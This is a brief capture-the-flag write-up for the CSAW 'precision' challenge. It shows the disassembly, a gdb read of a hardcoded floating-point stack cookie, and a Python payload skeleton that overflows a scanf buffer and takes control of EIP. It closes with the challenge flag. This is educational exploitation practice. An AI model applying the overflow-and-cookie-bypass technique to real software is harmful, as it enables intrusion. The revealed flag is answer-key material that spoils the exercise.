CSAW CTF – Exploitables100 – precision

Given 32-bit ELF reads user input using scanf("%s", &buf), resulting in buffer overflow. Just before returning, it does a floating point comparison

.text:08048529 fld ds:floating_num
.text:0804852F fstp [esp+0A0h+check]

.text:08048596 fld [esp+0A0h+check]
.text:0804859D fld ds:floating_num
.text:080485A3 fucomip st, st(1)
.text:080485A5 fstp st
.text:080485A7 jz short ret
The floating point number is a 64 bit value, which acts as a cookie. Since this value is hardcoded, just fetch it and use it during overwrite

gdb-peda$ x/gx 0x08048690
0x8048690: 0x40501555475a31a5
So contruct a payload like below, to control EIP

payload = "A" * 128
payload += struct.pack("<Q", 0x40501555475a31a5)
payload += "A"*12
payload += struct.pack("<I", EIP)
Flag is flag{1_533_y0u_kn0w_y0ur_w4y_4r0und_4_buff3r}